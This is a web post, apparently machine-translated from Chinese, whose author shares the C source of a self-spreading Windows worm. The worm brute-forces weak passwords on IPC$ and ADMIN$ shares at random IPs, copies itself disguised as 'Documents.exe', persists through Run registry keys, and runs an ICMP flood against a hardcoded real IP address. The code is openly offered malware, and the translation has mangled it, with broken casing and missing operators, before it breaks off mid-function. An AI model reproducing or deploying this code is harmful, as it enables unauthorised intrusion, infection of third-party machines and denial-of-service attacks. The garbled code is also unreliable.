DIY a simple sharing of Concuse

DIY a simple sharing of Concuse

/ * WRITEBY: LOND8QQ: 104154682003.2 Declaration: I am writing to learn practices, please use it to learn, test, please don't spread on the internet, otherwise anything caused by myself and Chongqing Black League It is relatively simple to say that this Confucianism is relatively simple, mainly by scanning weak passwords, and shared resources. And disguise a folder. When someone runs it, it will be copied into kernerl.exe in the system directory and modify the registry. The next turns automatically runs kernel.exe and infect other machines. The principle is simple. The program is a console mode when debugging, all _tprintf is the debugging used in WinMain without a virus, there is no self-protection part, will be gestured to kill. Because the protection part is more troublesome. I did a little but didn't succeed. Plus how much time, find the wrong. I will not do it for the time being. :) If you are interested in the master, what is good idea. Study together! (There is QQ above) because there is no self-protection, this is a failed Confucianism, and it is estimated that the communication is not large. Due to the spread of viruses online, I didn't dare to try the power, just tested the expected purpose on this machine and virtual machine.

The code is as follows: (now ugly) * / # Define unicode # define _unicode # include "winsock2.h" #include #include "windows.h" #include "stdio.h" #include "lm.h "#include" tchar.h "#pragma comment (lib," ws2_32 ") # Pragma Comment (lib," mpr ") # Pragma Comment (lib," netapi32 ") typef struct _iHDR {byte i_type; // 8-bit type Byte i_code; // 8-bit code ushort i_cksum; // 16-bit check and usort i_id; // identifier number ushort i_seq; // message serial number Ulong timestamp; // Timestamp} ICMP_HEPEDEF STRUCT {Int size; SockAddr_in attack; char * buf; socket s;} Netinfor; // Used to pass the basic information of the Attack function TCHAR * DESIP = _t ("209.67.3.106"); // The target of attack can be the White House :) Bool Callback getUserList (Tchar * Server, Tchar Name [50]; Bool Callback Connectremote (Bool, Tchar *, Tchar *, Tchar *, Tchar *); Void Callback Randomip (Tchar * RIP); DWORD Callback Spread (LPVOID); Bool Callback GetSouces (Tchar * Server, Tchar Souce [20]); Void Callback Upfile (Tchar * RIP, Tchar * Name, Tchar * Pass, Tchar Souce [15] [20]); DWORD WINAPI Attack (LPVOID) ; Ushort checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {CKS Um = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar *) buffer;} cksum = (cksum >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSum) >> 16); Return (~ CKSUM);} DWORD WINAPI SPREAD (LPVOID) // Dissemination If the password is detected to upload virus {Tchar Password [15] [15] = {_ T (""), _ T ( "ASDF"), _ T ("123456789"), _ T ("666888"), _ t ("HACKER"), _ T ("Hello"), _ T ("password"), _ t (" 123456 "), _ T (" 111 "), _ t (" administrator "), _ t (" admin "), _ t (" system "), _ t (" windows "), _ t (" 123321 ")};

// A built-in dictionary can expand while (TRUE) {tchar rip [50] = _ t (""); tchar name [30] = _ t ("); tchar pass [15] = _ t (")); TCHAR Username [50] [30] = {0}; tchar Souce [15] [20] = {0}; Randomip (RIP); NetResource NR; DWORD RET; TCHAR IPC [100] = _ T (""); SWPrintf (IPC, _T ("% s // IPC $"), RIP); nr.lplocalname = null; nr.lpprovider = null; nr.dwtype = resourcety_any; nr.lpremotename = IPC; RET = WNETADDCONNECTION2 (& NR, Pass, Name, 0); if (RET! = Error_Success) {Printf ("/ NIPC $ Connect Failed./N "; computerlist (RIP, Username) && getSouces (RIP, Souce) {RET = WnetCancelConnection2 (IPC, 0, TRUE); if (RET! = Error_Success) {_tprintf (_T ("IPC $ Disconnect Failed./N")); // Return -1;} Bool ISOK = FALSE; INT K = 0; int i; for (i = 0; username [0]! = 0; i ) {_ tprintf (_T ("/ n next username!"); while (k <15) IF (True, Rip, Username, Password [k], _ t ("admin $"))) {isok = true; wcscpy (name, username); wcscpy (pass, password [k]); Connectremote (False, Rip, Username, Password [K], _ T ( "Admin $")); goto spreadsuccess;} else K ; IF (Connectremote, Username, USE RNAME, _T ("admin $"))) {isok = true; wcscpy (name, username); wcscpy (pass, username); Connectremote (false, rip, username, username, _t ("admin $"); goto Spreadsuccess;}}} {Upfile (RIP, Name, Pass, Souce);}} else WnetCancelConnection2 (IPC, 0, True); Sleep (10);}} // ======= =================================================

======= BOOL CALLBACK ConnectRemote (BOOL bConnect, TCHAR * lpHost, TCHAR * lpUserName, TCHAR * lpPassword, TCHAR * lpSouce) {TCHAR lpIPC [256] = {0}; DWORD dwErrorCode; NETRESOURCE NetResource; swprintf (lpIPC , _T ( "% s //% s"), lpHost, lpSouce); NetResource.lpLocalName = NULL; NetResource.lpRemoteName = lpIPC; NetResource.dwType = RESOURCETYPE_ANY; NetResource.lpProvider = NULL; if (wcsicmp (lpPassword, _T! ("Null"))) {lppassword = null;} if (bconnect) {_tprintf (_t ("now connecting ...")); while (1) {dwerrorcode = wnetdConnection2 (& NetResource, lppassword, lpusername, 0); if ((dwErrorCode == ERROR_ALREADY_ASSIGNED) || (dwErrorCode == ERROR_DEVICE_ALREADY_REMEMBERED)) {WNetCancelConnection2 (lpIPC, 0, TRUE);} else if (dwErrorCode == NO_ERROR) {_tprintf (_T ( "! Success / n" )); Break;} else {_tprintf (_T ("failure! / N")); return false;} Sleep (10);} } Else {_tprintf (_t ("now disconnecting ..."); dwerrorcode = wnetcancelconnection2 (lpipc, 0, true); if (dwerrorcode == no_ERROR) {_tprintf (_t ("success! / N"));} Else {_tprintf (_T ("failure! / n")); return false;}} return true;} Bool Callback getUserList (tchar * server, tchar name [50] [30]) // obtain user list {PNET_DISPLAY_USER PBUF, PBUFFER; DWORD NSTATUS; DWORD DWREC; DWORD I = 0; DWORD LERROR; DWORD DWLEVEL; INT NUM = 0; dWlevel = 1; // wchar_t wpchar [30] = {0};

// MultibyTetowideChar (CP_ACP, 0, Server, -1, WPChar, 30); // WPrintf (WPCHAR); Printf ("/ n ******* / n"); do {nStatus = NetQueryDisplayInformation (server, dwLevel, i, 100,0xFFFFFFFF, & dwRec, (PVOID *) & pBuf); if ((nStatus == ERROR_SUCCESS) || (nStatus == ERROR_MORE_DATA)) {pBuffer = pBuf; for (; DWREC> 0; dwrec -) {// char bufname [30] = {0}; // widechartomultibyte (cp_maccp, 0, pbuffer-> usri1_name, -1, bufname, 30, null, null); if (Num < 50) {Memcpy (Name [Num], PBuffer-> USRI1_NAME, WCSLEN (PBuffer-> USRI1_NAME) * SIZEOF (TCHAR)); Num ;} else goto userfuncept; _tprintf (_t (_t ("/ nname: / t% s "), Name [num-1]); i = pBuffer-> usri1_next_index; pBuffer ;}} else {lerror = getLastError (); if (lerror == 997) {_tprintf (_t (" / ngetuserlist: / t / toverlapped I / O Operation IS in Progress./N ")); Return False;} else {_tprintf (_t (" / ngetuserlist error: / t% d / n "), lerror); return false;}} UserfunceXit: IF PBUF! = null) { Netapibufferfree (PBUF);}}}} while (NSTATUS == Error_More_Data); Return True;} Void Callback Randomip (TCHAR * RIP) // Generate a random IP {UNSIGNED Long H = gettickcount () * 198288; char * p; p = INET_NTOA (* (Struct In_addr *) & H); MultibyToWideChar (CP_ACP, 0, P, -1, RIP, 50); _ TPrintf (_T ("% s"), RIP);} Bool Callback getsouces (tchar * server, tchar Souce [15]] // Get a remote shared resource {dWord Er = 0, Tr = 0, Resume = 0; DWORD I, DWLEVEL; PSHARE_INFO_1 PBUF, PBuffer; Net_API_Status Nstatus; DWORD LERROR; INT NUM = 0; dwlevel = 1; _tprintf (_t ("/ n ****** Netbios ****** / n")); do {nstatus =

NetShareEnum (server, dwLevel, (PBYTE *) & pBuf, MAX_PREFERRED_LENGTH, & er, & tr, & resume); if ((nStatus == ERROR_SUCCESS) || (nStatus == ERROR_MORE_DATA)) {pBuffer = pBuf; for (i = 0; i = 15) Goto EXITGETSOUCE; if (PBuffer-> Shi1_Type == STYPE_DISKTREE) {WCSCPY (Souce [Num ], PBuffer-> Shi1_NetName); _ TPrintf ("Name:% s / n "), Souce [NUM-1]); _tprintf (_T (" Disk Drive./N ")));} else if (PBuffer-> Shi1_Type == STYPE_PRINTQ) {_tprintf (_T (" Print Queue./N " ));} Else if (pBuffer-> shi1_type == style_device) {_tprintf (_T ("Communication Device./N"));} else if (PBuffer-> Shi1_Type == STYPE_IPC) {_tprintf (_t ("InterProcess Communication (IPC) ./ n "));} else if (pBuffer-> shi1_type == stype_special) {wcscpy (Souce [Num ], PBuffer-> shi1_netname); _ TPrintf (_t (" name:% s / n "), Souce [NUM-1]); _tprintf (_T ("Special Share Reserved for InterProcess Communication OR Remote administration of the server (admin $) ./ n "));} else {_tprintf (_t (" / n "));} PBuffer ;}} else {lerror = getLastError (); if (lerror == 997) {_t ("/ nnetbios: / Toverlapped I / O Operation is in propress./n") );return false;} else {_tprintf (_t (" / nnetbios error: / t% d / n "), Lerror Return False;}}}} EXITGETSOUCE: IF (PBUF! = null) {NetapibufferFree (PBUF);}} while (nstatus ==

ERROR_MORE_DATA); RETURN TRUE;} Void Callback Upfile (Tchar * RIP, TCHAR * NAME, TCHAR * Pass, Tchar Souce [15] [20]) // On each shared folder, the virus virus disguise into folder, name Documents .exe {TCHAR lpCurrentPath [MAX_PATH] = {0}; TCHAR lpSystemPath [MAX_PATH] = {0}; int i; GetSystemDirectory (lpSystemPath, MAX_PATH); wcscat (lpCurrentPath, lpSystemPath); _ tprintf (_T ( "% s"), Lpsystempath; wcscat (lpCurrentPath, _T ("// kernel.exe")); _ TPrintf (_t ("/ n% s"), lpcurrentpath); for (i = 0; i <15 && souce [0]! = 0; i ) {IF (ConnectRemote (True, RIP, Name, Pass, Souce) {tchar lpremoteexepath [MAX_PATH] = {0}; swprintf (lpremoteexepath, _t ("% s //% s // Documents.exe" ), Rip, soce; copyfile (lpcurrentpath, false); if (! WCSCMP (Souce, _T ("admin $"))) {MEMSET (LPREMoteexepath, 0, Wcslen (lpRemoteexepath) * sizeof (tchar)); SWPRINTF (LPREMOTEEXEPATH, _T ("% s //% s /////////////////////////////////////////////////////////////////////////////////////////> (LpCurrentPath, LPREMOTEEXEPATH, FALSE);} ConnectRemote (False, RIP, Name, Pass, Souce);}}} void WinAPI ModifyReg () // Modify Registry {Tchar lpsystemPath [MAX_PATH] = {0}; tchar lpcurrentpath [MAX_PATH] = {0}; getSyst Emdirectory (LpsystemPath, Max_Path); WCSCAT (LPSystemPath, _T ("// kernel.exe"); tchar * lpvalueename = _t ("Software // Microsoft // Windows // CurrentVersion // Run //"); RegSetValue HKEY_LOCAL_MACHINE, lpValueName, REG_SZ, lpSystemPath, wcslen (lpSystemPath) * sizeof (TCHAR)); TCHAR * lpSunkey = _T ( "SOFTWARE // Microsoft // Windows // CurrentVersion // RunServices //"); RegSetValue (HKEY_LOCAL_MACHINE, lpSunkey, REG_SZ, lpSystemPath, wcslen (lpSystemPath) * sizeof (TCHAR)); GetModuleFileName (NULL, lpCurrentPath, MAX_PATH); wprintf (lpCurrentPath); CopyFile (lpCurrentPath, lpSystemPath, FALSE);} DWORD WINAPI Attack (LPVOID lp) // the object IP Send ICMP FLOOD {Socket Sock;

CHAR * ACKBUF; INCKADDR_IN Attack; Int size; Netinfor * P = (Netinfor *) LP; SOCK = P-> S; Ackbuf = P-> BUF; Size = P-> Size; Memcpy (& Attack, & P-> Attack, SIZEOF (Attack); DWORD ERRORCODE = 0; While (True) {for (int counter = 0; counter <1024; counter ) errorcode = sendto (Sock, Ackbuf, Size, 0, (Struct Sockaddr *) & attck, sizeof attack)); Sleep (5);} return 0;} int WINAPI WinMain (hINSTANCE hInstance, hINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {WSADATA WSAData; SOCKET sock = NULL; SOCKADDR_IN attack; BOOL flag = TRUE; DWORD ErrorCode = 0; ICMP_HEADER ICMP_HEADER; MEMSET (& ICMP_HEADER, 0, SIZEOF (ICMP_HEADER)); if (WSAStartup (MakeWord (2, 2), & WSADATA! = 0) {Return 0;} IF (((Sock = WSASASOCKET (AF_INET, SOCKT (RAW, IPPROTO_ICMP, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {// MessageBox (NULL, _T ( "sock false"), NULL, NULL);} int TimeOut = 2000; ErrorCode = setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, ( Char *) & Timeout, SizeOf (Timeout)); if (ErrorCode == Socket_ERROR) {// MessageBox (Null, _T ("ICMP false"), null, null;} CHAR CP [30] = {0}; WideChartomultibyte (CP_MACCP , 0, desip, -1, cp, 30, null, null; attack.sin_family = af_INET; attack.sin_addr.s_un.s_addr = inet_addr (cp); ICMP_Header.i_Type = 8; ICMP_Header.i_code = 0; ICMP_HEADER. i_cksum = 0; icmp_header.i_id = 2; icmp_header.timestamp = GetTickCount (); icmp_header.i_seq = 888; CHAR AckBuf [100] = {0}; memcpy (AckBuf, & icmp_header, sizeof (icmp_header)); memset (AckBuf sizeof (icmp_header), 'A', 20); icmp_header.i_cksum = checksum ((USHORT *) AckBuf, sizeof (icmp_header) 20); int datasize = sizeof (icmp_header) 20; memcpy (AckBuf, & icmp_header, sizeof ( ICMP_HEADER);